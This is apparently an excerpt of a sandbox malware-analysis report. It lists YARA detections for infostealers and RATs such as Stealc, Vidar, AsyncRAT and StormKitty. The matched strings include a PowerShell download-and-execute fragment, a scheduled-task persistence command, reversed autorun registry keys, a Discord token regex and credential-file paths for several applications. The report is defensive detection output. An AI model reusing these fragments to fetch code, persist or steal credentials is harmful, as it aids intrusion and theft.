C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe	infostealer_win_stealc_str_oct24	Finds Stealc standalone samples (or dumps) based on the strings	Sekoia.io	0x33dd0:$str01: -nop -c "iex(New-Object Net.WebClient).DownloadString( 0x33f28:$str02: Azure\.IdentityService 0x33f4c:$str03: steam_tokens.txt 0x33be0:$str04: "encrypted_key":" 0x33d08:$str05: prefs.js 0x33d80:$str06: browser: FileZilla 0x33d94:$str07: profile: null 0x33da4:$str08: url: 0x33dac:$str09: login: 0x33db4:$str10: password:
C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe	infostealer_win_stealc_str_oct24	Finds Stealc standalone samples (or dumps) based on the strings	Sekoia.io	0x33dd0:$str01: -nop -c "iex(New-Object Net.WebClient).DownloadString( 0x33f28:$str02: Azure\.IdentityService 0x33f4c:$str03: steam_tokens.txt 0x33be0:$str04: "encrypted_key":" 0x33d08:$str05: prefs.js 0x33d80:$str06: browser: FileZilla 0x33d94:$str07: profile: null 0x33da4:$str08: url: 0x33dac:$str09: login: 0x33db4:$str10: password:
Click to see the 27 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000003.3280907715.0000000005230000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000022.00000003.3876667619.00000000013EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x28ee2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25463:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000003.00000002.3141398938.0000000000C41000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000035.00000003.3869120489.0000000005630000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000003.3875739949.0000000001397000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000003.3879611236.00000000013ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000034.00000003.4017208405.0000000001254000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.3784671857.000001C5AE540000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x31e70:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000005.00000002.2590347965.0000000000981000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.2205307367.0000000001258000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x1a2a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000003.00000002.3147595579.000000000121E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000015.00000003.3246634684.0000000004980000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000B.00000002.4738635134.0000000000E41000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x15a2a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000024.00000002.3809039923.0000000140000000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000003.3567876163.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000003.3567876163.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x1a2a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x1a2a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000002.2632687565.0000000000E41000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000002.3165891597.00000000007B1000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x2068c:$str01: MachineID: 0x1f051:$str02: Work Dir: In memory 0x206c3:$str03: [Hardware] 0x20675:$str04: VideoCard: 0x1fce5:$str05: [Processes] 0x1fcf1:$str06: [Software] 0x1f1bb:$str07: information.txt 0x20398:$str08: %s\* 0x203e5:$str08: %s\* 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1fb61:$str12: UseMasterPassword 0x206cf:$str13: Soft: WinSCP 0x2016e:$str14: <Pass encoding="base64"> 0x206b2:$str15: Soft: FileZilla 0x1f1ad:$str16: passwords.txt 0x1fb8c:$str17: build_id 0x1fc80:$str18: file_data
00000015.00000002.3287892835.0000000000F71000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000035.00000002.4622729473.0000000000E31000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.3410807562.0000000001E58000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000014.00000002.3410807562.0000000001E58000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x2068c:$str01: MachineID: 0x1f051:$str02: Work Dir: In memory 0x206c3:$str03: [Hardware] 0x20675:$str04: VideoCard: 0x1fce5:$str05: [Processes] 0x1fcf1:$str06: [Software] 0x1f1bb:$str07: information.txt 0x20398:$str08: %s\* 0x203e5:$str08: %s\* 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1fb61:$str12: UseMasterPassword 0x206cf:$str13: Soft: WinSCP 0x2016e:$str14: <Pass encoding="base64"> 0x206b2:$str15: Soft: FileZilla 0x1f1ad:$str16: passwords.txt 0x1fb8c:$str17: build_id 0x1fc80:$str18: file_data
0000000B.00000003.3763224367.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000003.3763224367.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x1a2a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000019.00000002.3783415700.000001C5AE46E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.3734030557.000001C59617A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2a2a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000014.00000002.3410807562.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000014.00000002.3410807562.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000014.00000002.3410807562.0000000001E0C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000014.00000002.3410807562.0000000001E0C000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x2068c:$str01: MachineID: 0x1f051:$str02: Work Dir: In memory 0x206c3:$str03: [Hardware] 0x20675:$str04: VideoCard: 0x1fce5:$str05: [Processes] 0x1fcf1:$str06: [Software] 0x1f1bb:$str07: information.txt 0x20398:$str08: %s\* 0x203e5:$str08: %s\* 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1fb61:$str12: UseMasterPassword 0x206cf:$str13: Soft: WinSCP 0x2016e:$str14: <Pass encoding="base64"> 0x206b2:$str15: Soft: FileZilla 0x1f1ad:$str16: passwords.txt 0x1fb8c:$str17: build_id 0x1fc80:$str18: file_data
00000016.00000003.3279869843.0000000004F00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x2489e:$x5: vchost.exe
0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x2148c:$str01: MachineID: 0x1fe51:$str02: Work Dir: In memory 0x214c3:$str03: [Hardware] 0x21475:$str04: VideoCard: 0x20ae5:$str05: [Processes] 0x20af1:$str06: [Software] 0x1ffbb:$str07: information.txt 0x21198:$str08: %s\* 0x211e5:$str08: %s\* 0x203a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x20961:$str12: UseMasterPassword 0x214cf:$str13: Soft: WinSCP 0x20f6e:$str14: <Pass encoding="base64"> 0x214b2:$str15: Soft: FileZilla 0x1ffad:$str16: passwords.txt 0x2098c:$str17: build_id 0x247a0:$str17: build_id 0x20a80:$str18: file_data 0x2488f:$str18: file_data
00000017.00000002.3321333193.0000000000E31000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000002.3320866189.0000000000E31000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x60a2a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000006.00000002.2617283452.0000000000E41000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: i8Vwc7iOaG.exe PID: 3640	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: i8Vwc7iOaG.exe PID: 3640	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Y71AV1VIPLT8Y663WBDXSB.exe PID: 6448	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Y71AV1VIPLT8Y663WBDXSB.exe PID: 6448	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: Y71AV1VIPLT8Y663WBDXSB.exe PID: 6448	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Y71AV1VIPLT8Y663WBDXSB.exe PID: 6448	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: skotes.exe PID: 7608	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: skotes.exe PID: 7608	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2aca0:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x455b8:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x50246:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x789fb:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9caad:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: 52ba7a538c.exe PID: 6324	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 52ba7a538c.exe PID: 6324	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: soonmaintain.exe PID: 1488	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: soonmaintain.exe PID: 1488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3176	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3176	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3176	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: t0IHakP.exe PID: 8100	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Process Memory Space: t0IHakP.exe PID: 8100	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: t0IHakP.exe PID: 8100	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: t0IHakP.exe PID: 8100	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: t0IHakP.exe PID: 8100	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: t0IHakP.exe PID: 8100	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x12aa0:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: t0IHakP.exe PID: 8100	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x115be:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x26e60:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 82 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
25.2.soonmaintain.exe.1c595d68508.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
25.2.soonmaintain.exe.1c5ae540000.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
20.2.52ba7a538c.exe.1e58000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
20.2.52ba7a538c.exe.1e58000.2.raw.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x2068c:$str01: MachineID: 0x1f051:$str02: Work Dir: In memory 0x206c3:$str03: [Hardware] 0x20675:$str04: VideoCard: 0x1fce5:$str05: [Processes] 0x1fcf1:$str06: [Software] 0x1f1bb:$str07: information.txt 0x20398:$str08: %s\* 0x203e5:$str08: %s\* 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1fb61:$str12: UseMasterPassword 0x206cf:$str13: Soft: WinSCP 0x2016e:$str14: <Pass encoding="base64"> 0x206b2:$str15: Soft: FileZilla 0x1f1ad:$str16: passwords.txt 0x1fb8c:$str17: build_id 0x1fc80:$str18: file_data
36.2.InstallUtil.exe.140000000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.3.skotes.exe.9d0e9d.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.3.skotes.exe.9d0e9d.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x5b8d:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
25.2.soonmaintain.exe.1c595d68508.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.52ba7a538c.exe.1e32000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
20.2.52ba7a538c.exe.1e32000.1.raw.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x2068c:$str01: MachineID: 0x1f051:$str02: Work Dir: In memory 0x206c3:$str03: [Hardware] 0x20675:$str04: VideoCard: 0x1fce5:$str05: [Processes] 0x1fcf1:$str06: [Software] 0x1f1bb:$str07: information.txt 0x20398:$str08: %s\* 0x203e5:$str08: %s\* 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1fb61:$str12: UseMasterPassword 0x206cf:$str13: Soft: WinSCP 0x2016e:$str14: <Pass encoding="base64"> 0x206b2:$str15: Soft: FileZilla 0x1f1ad:$str16: passwords.txt 0x1fb8c:$str17: build_id 0x1fc80:$str18: file_data
20.2.52ba7a538c.exe.1e0c000.3.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
20.2.52ba7a538c.exe.1e0c000.3.raw.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x2068c:$str01: MachineID: 0x1f051:$str02: Work Dir: In memory 0x206c3:$str03: [Hardware] 0x20675:$str04: VideoCard: 0x1fce5:$str05: [Processes] 0x1fcf1:$str06: [Software] 0x1f1bb:$str07: information.txt 0x20398:$str08: %s\* 0x203e5:$str08: %s\* 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1fb61:$str12: UseMasterPassword 0x206cf:$str13: Soft: WinSCP 0x2016e:$str14: <Pass encoding="base64"> 0x206b2:$str15: Soft: FileZilla 0x1f1ad:$str16: passwords.txt 0x1fb8c:$str17: build_id 0x1fc80:$str18: file_data
26.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
26.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
26.2.BitLockerToGo.exe.400000.0.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x2489e:$x5: vchost.exe
26.2.BitLockerToGo.exe.400000.0.raw.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x2148c:$str01: MachineID: 0x1fe51:$str02: Work Dir: In memory 0x214c3:$str03: [Hardware] 0x21475:$str04: VideoCard: 0x20ae5:$str05: [Processes] 0x20af1:$str06: [Software] 0x1ffbb:$str07: information.txt 0x21198:$str08: %s\* 0x211e5:$str08: %s\* 0x203a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x20961:$str12: UseMasterPassword 0x214cf:$str13: Soft: WinSCP 0x20f6e:$str14: <Pass encoding="base64"> 0x214b2:$str15: Soft: FileZilla 0x1ffad:$str16: passwords.txt 0x2098c:$str17: build_id 0x247a0:$str17: build_id 0x20a80:$str18: file_data 0x2488f:$str18: file_data
26.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
26.2.BitLockerToGo.exe.400000.0.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x2068c:$str01: MachineID: 0x1f051:$str02: Work Dir: In memory 0x206c3:$str03: [Hardware] 0x20675:$str04: VideoCard: 0x1fce5:$str05: [Processes] 0x1fcf1:$str06: [Software] 0x1f1bb:$str07: information.txt 0x20398:$str08: %s\* 0x203e5:$str08: %s\* 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1fb61:$str12: UseMasterPassword 0x206cf:$str13: Soft: WinSCP 0x2016e:$str14: <Pass encoding="base64"> 0x206b2:$str15: Soft: FileZilla 0x1f1ad:$str16: passwords.txt 0x1fb8c:$str17: build_id 0x1fc80:$str18: file_data
20.2.52ba7a538c.exe.1e32000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
20.2.52ba7a538c.exe.1e32000.1.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1f88c:$str01: MachineID: 0x1e251:$str02: Work Dir: In memory 0x1f8c3:$str03: [Hardware] 0x1f875:$str04: VideoCard: 0x1eee5:$str05: [Processes] 0x1eef1:$str06: [Software] 0x1e3bb:$str07: information.txt 0x1f598:$str08: %s\* 0x1f5e5:$str08: %s\* 0x1e7a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1ed61:$str12: UseMasterPassword 0x1f8cf:$str13: Soft: WinSCP 0x1f36e:$str14: <Pass encoding="base64"> 0x1f8b2:$str15: Soft: FileZilla 0x1e3ad:$str16: passwords.txt 0x1ed8c:$str17: build_id 0x1ee80:$str18: file_data
20.2.52ba7a538c.exe.1e0c000.3.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
20.2.52ba7a538c.exe.1e0c000.3.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1f88c:$str01: MachineID: 0x1e251:$str02: Work Dir: In memory 0x1f8c3:$str03: [Hardware] 0x1f875:$str04: VideoCard: 0x1eee5:$str05: [Processes] 0x1eef1:$str06: [Software] 0x1e3bb:$str07: information.txt 0x1f598:$str08: %s\* 0x1f5e5:$str08: %s\* 0x1e7a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1ed61:$str12: UseMasterPassword 0x1f8cf:$str13: Soft: WinSCP 0x1f36e:$str14: <Pass encoding="base64"> 0x1f8b2:$str15: Soft: FileZilla 0x1e3ad:$str16: passwords.txt 0x1ed8c:$str17: build_id 0x1ee80:$str18: file_data
11.3.skotes.exe.9d0e9d.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
29.0.t0IHakP.exe.d00000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
29.0.t0IHakP.exe.d00000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
29.0.t0IHakP.exe.d00000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.0.t0IHakP.exe.d00000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
29.0.t0IHakP.exe.d00000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
29.0.t0IHakP.exe.d00000.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
29.0.t0IHakP.exe.d00000.0.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
29.0.t0IHakP.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
29.0.t0IHakP.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
29.0.t0IHakP.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
